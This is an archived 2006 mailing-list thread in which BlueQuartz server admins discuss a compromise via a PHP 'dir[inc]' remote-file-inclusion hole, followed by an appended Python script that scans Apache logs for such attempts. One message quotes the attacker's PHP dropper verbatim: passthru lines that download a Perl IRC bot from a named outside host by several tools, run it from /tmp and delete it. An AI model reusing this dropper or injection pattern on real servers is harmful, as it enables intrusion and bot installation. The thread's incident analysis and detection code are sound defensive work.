
Date:  Mon, 11 Sep 2006 19:30:52 -0400
From:  "Darrell D. Mobley" <dmobley (at mark) uhostme.net>
Subject:  [coba-e:06842] Re: /TMP Directory
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <00cb01c6d5fa$52a73d30$6400a8c0@YOUR4105E587B6>
In-Reply-To:  <4505E107.1060300 (at mark) planetcentral.net>
X-Mail-Count: 06842

I read somewhere on the 'net that .ICE-unix was ok.  .LiveZone is definitely
not.

My BQ machine made it up to server load 271!

> -----Original Message-----
> From: paul [mailto:paul (at mark) planetcentral.net]
> Sent: Monday, September 11, 2006 6:20 PM
> To: coba-e (at mark) bluequartz.org
> Subject: [coba-e:06838] Re: /TMP Directory
> 
> :o oh my god... I have been trying for the last 2 days to work out what
> was up with my server, and that's it....
> 
> I seem to have the following in my /tmp folder :
> 
> 
> total 44
> drwxrwxrwt   5 root   root   4096 Sep 11 23:11 .
> drwxr-xr-x  25 root   root   4096 Sep 11 22:10 ..
> -rw-------   1 root   root     49 Sep 11 23:11 ClamAVBusy.lock
> drwxrwxrwt   2 root   root   4096 Sep 11 22:10 .ICE-unix
> drwxr-xr-x  10 apache apache 4096 Sep 11 22:09 .LiveZone
> drwxr-xr-x   9 apache apache 4096 Sep 11 23:06 matahati
> -rw-------   1 root   root   4697 Sep  9 21:35 .spamassassin4037sdcX9Htmp
> -r--r--r--   1 root   root    275 Sep 11 23:01 yum.check-update
> -rw-r--r--   1 root   root   1367 Sep 11 05:31 yum.update
> 
> Now the Clam I can understand. The yum and the SpamAssassin also. The
> rest shouldn't be there and need to be removed.
> 
> Please PLEASE could someone tell me how I can rid myself of this!
> 
> Now I know why I'm getting perl scripts hanging, using 98% CPU time and
> the box load hits over 50 and things stop working!
> 
> Please help... It's only a home box with a couple of sites on it, but I
> want to get it back!!
> 
> Thanks
> Paul
> 
> 
> Paul Wilson - Swift Internet wrote:
> > It is also likely that your PHP script has a severe vulnerability in it
> >
> > I think the attack was in two parts - did you see the php script being
> > used in the following way (check your access_log)
> >
> > ****php?dir[inc]=http:// "URL location of attack script"
> >
> > This script would then be run to pull in the v6 script that you saw in
> > action.
> >
> >
> > The "php?dir[inc]" vulnerability became known at the tail end of
> > August, so these attacks are going to become more widespread.
> >
> > And yes, one of our servers was hit this way.
> >
> >
> > Regards
> >
> > Paul
> >
> >
> > ----- Original Message ----- From: "Darrell D. Mobley"
> > <dmobley (at mark) uhostme.net>
> > To: <coba-e (at mark) bluequartz.org>
> > Sent: Saturday, September 09, 2006 9:44 PM
> > Subject: [coba-e:06808] /TMP Directory
> >
> >
> >> There was some discussion here lately about the security fix that
> >> stopped
> >> programs from running in /TMP.  Is this configured by default if you
> >> have
> >> your BQ Yum updated?  I got a DDOS today where the users were trying
> >> to run
> >> the following program via PHP:
> >>
> >> <?
> >> passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl
> >> v6.txt;rm -f v6*');
> >> passthru('cd /tmp;curl -O
> >> http://perqafohu.com/~armendibx/oki/v6.txt;perl
> >> v6.txt;rm -f v6*');
> >> passthru('cd /tmp;lwp-download
> >> http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
> >> passthru('cd /tmp;lynx -source
> >> http://perqafohu.com/~armendibx/oki/v6.txt
> >>> v6.txt;perl v6.txt;rm -f v6*');
> >> passthru('cd /tmp;fetch http://perqafohu.com/~armendibx/oki/v6.txt
> >>> v6.txt;perl v6.txt;rm -f v6*');
> >> passthru('cd /tmp;GET http://perqafohu.com/~armendibx/oki/v6.txt
> >>> v6.txt;perl v6.txt;rm -f v6*');
> >> ?>
> >>
> >> The v6.txt is a Perl script that installs some IRC software and
> >> monitors IRC
> >> on open ports.  I do not think the script was successful in running,
> >> but I
> >> just want to make sure the /TMP security is enabled where files can't
> >> be run
> >> there.  While I don't think the DDOS attack was successful in running
> >> the
> >> script, it was successful in shutting down the server due to MySQL
> >> becoming
> >> overwhelmed.  Server load was up to 156!
> >>
> >> Any suggestions would be appreciated.
> >>
> >>
> >
> >
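Editor's note: Paul Wilson's advice above is to check access_log for requests of the form `php?dir[inc]=http://...`. The following is an added example (not code from anyone in this thread) of how to do that check over an Apache combined-format log. It generalizes slightly beyond the `dir[inc]` signature: it percent-decodes every query parameter and flags any whose value is a remote URL, which is the general shape of a remote-file-inclusion attempt, while letting you allow-list parameters that legitimately carry URLs (a redirect target, for instance). The log lines, IP addresses and parameter names in `SAMPLE_LOG` are constructed for illustration and are not from the thread.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines in Apache "combined" format (not from the thread).
# Addresses are from documentation ranges, not real hosts; the script names
# and parameters are placeholders chosen to resemble the pattern discussed.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Sep/2006:23:05:12 +0100] "GET /gallery/index.php?dir[inc]=http://198.51.100.7/~user/cmd.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [11/Sep/2006:23:05:15 +0100] "GET /gallery/index.php?dir%5Binc%5D=hTTp%3A%2F%2F198.51.100.7%2Fcmd.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.44 - - [11/Sep/2006:23:06:01 +0100] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.44 - - [11/Sep/2006:23:06:30 +0100] "GET /redirect.php?to=http://www.example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
garbage line that does not parse
"""

# One combined-format line: client, identd, user, [timestamp], "METHOD target [protocol]", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)
# A parameter value that points at a remote resource (scheme is case-insensitive)
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi_attempts(log_text, known_url_params=frozenset()):
    """Flag requests whose query parameters carry a remote URL.

    known_url_params: parameter names that legitimately take URLs (e.g. a
    redirect target) and should not be reported.  Each finding records the
    response status so you can see whether the server answered 200 (the
    include may have run) rather than 4xx/5xx.
    """
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines that are not in the expected format
        query = rec["target"].partition("?")[2]
        # parse_qs percent-decodes both names and values, so dir%5Binc%5D
        # becomes dir[inc] and http%3A%2F%2F becomes http://, defeating the
        # simple encoding trick used to dodge a plain grep for "=http://".
        for name, values in parse_qs(query, keep_blank_values=True).items():
            if name in known_url_params:
                continue
            for value in values:
                if REMOTE_URL_RE.match(value):
                    findings.append({
                        "line": lineno,
                        "ip": rec["ip"],
                        "param": name,
                        "value": value,
                        "status": int(rec["status"]),
                        # PHP array-style parameter (name[key]) as in the dir[inc] reports
                        "array_param": "[" in name,
                    })
    return findings


def summarize_by_ip(findings):
    """Count flagged requests per client address, to see who is probing."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_rfi_attempts(SAMPLE_LOG, known_url_params={"to"})
    for f in hits:
        print(f"line {f['line']}: {f['ip']} {f['param']}={f['value']!r} status {f['status']}")
    print(summarize_by_ip(hits))
```

Run it against a real log by replacing `SAMPLE_LOG` with the file's contents; a hit with status 200 on a script that includes a file named by a request parameter is the condition to treat as a likely compromise and to pair with the /tmp inspection Paul describes. One caveat on the /tmp mitigation discussed in the thread: mounting /tmp `noexec` blocks direct execution of files stored there, but the dropper shown above runs `perl v6.txt`, and an interpreter reading a script from /tmp is not stopped by `noexec`; the mount option narrows the attack surface but does not replace fixing the include.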